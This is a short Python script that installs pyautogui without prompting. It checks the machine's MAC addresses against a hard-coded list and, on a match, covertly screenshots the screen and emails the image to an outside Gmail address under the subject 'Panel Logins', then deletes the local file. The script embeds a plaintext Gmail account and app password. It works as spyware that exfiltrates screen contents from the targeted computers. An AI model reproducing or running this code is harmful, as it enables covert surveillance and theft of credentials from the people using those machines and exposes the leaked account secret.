import os
import subprocess as sp

import re






import sys

def install_package(package):
    sp.check_call([sys.executable, "-m", "pip", "install", package])

# Install pyautogui
install_package("pyautogui")

# Now you can import and use pyautogui in your script
import pyautogui






def main():
    # Run the 'ipconfig /all' command
    result = sp.run(['ipconfig', '/all'], capture_output=True, text=True)

    # Capture the output in the variable named 'tri'
    tri = result.stdout

    mac_address_pattern = r'Physical Address.*:\s+([0-9A-F-]+)'

    # Extract MAC addresses using the regex pattern
    mac_addresses = re.findall(mac_address_pattern, tri)

    if "36-02-86-52-8E-DD" in mac_addresses or "78-98-E8-1E-D3-08" in mac_addresses or "78-98-E8-1E-E6-D8" in mac_addresses or "90-B1-1C-8C-E7-E9" in mac_addresses or "90-B1-1C-89-06-E0" in mac_addresses or "90-B1-1C-99-71-77" in mac_addresses or "A0-A3-F0-15-C4-FB" in mac_addresses or "A0-A3-F0-15-CB-2C" in mac_addresses or "A2-A3-F0-15-C4-FB" in mac_addresses or "A2-A3-F0-15-C9-D8" in mac_addresses or "A2-A3-F0-15-CA-F7" in mac_addresses or "F8-B1-56-C2-E3-3D" in mac_addresses or "00-FF-1E-A9-EC-F1" in mac_addresses or "90-B1-1C-8D-85-46" in mac_addresses or "30-24-32-1E-08-43" in mac_addresses or "90-B1-1C-7C-7B-A0" in mac_addresses or "A0-A3-F0-15-D2-2B" in mac_addresses or "A4-1F-72-95-D3-28" in mac_addresses or "A4-1F-72-95-CD-5C" in mac_addresses or "A4-1F-72-51-6E-32" in mac_addresses or "A2-A3-F0-15-CB-2C" in mac_addresses or "A2-A3-F0-15-C4-FB" in mac_addresses or "A0-A3-F0-15-C4-FB" in mac_addresses or "90-B1-1C-8C-E7-E9" in mac_addresses or "70-5A-0F-CF-9E-C0" in mac_addresses or "34-17-EB-9B-1B-AA" in mac_addresses:
        
    
        from email.message import EmailMessage
        import ssl
        import smtplib
        import csv
        import pyautogui  # Import the pyautogui library
        
        email_sender = "mnadeemstar777@gmail.com"
        email_password = "zaektddcxhqebqol"
        email_receiver = "Ibrahim.abid.rajput.minhas@gmail.com"
        subject = "Panel Logins"
        
        # Take a screenshot
        screenshot_path = "screenshot.png"
        pyautogui.screenshot(screenshot_path)
        
        # Create the EmailMessage object
        em = EmailMessage()
        em['From'] = email_sender
        em['To'] = email_receiver
        em['Subject'] = subject
        em.set_content("Please find the screenshot attached.")
        
        # Attach the screenshot to the email
        with open(screenshot_path, 'rb') as screenshot_file:
            em.add_attachment(screenshot_file.read(), maintype="image", subtype="png", filename="screenshot.png")
        
        # SMTP setup and sending the email
        context = ssl.create_default_context()
        with smtplib.SMTP_SSL('smtp.gmail.com', 465, context=context) as smtp:
            smtp.login(email_sender, email_password)
            smtp.sendmail(email_sender, email_receiver, em.as_string())
        
        # Remove the screenshot file
        if os.path.exists(screenshot_path):
            os.remove(screenshot_path)
            print(f"{screenshot_path} has been removed.")
        
        



if __name__ == "__main__":
    main()
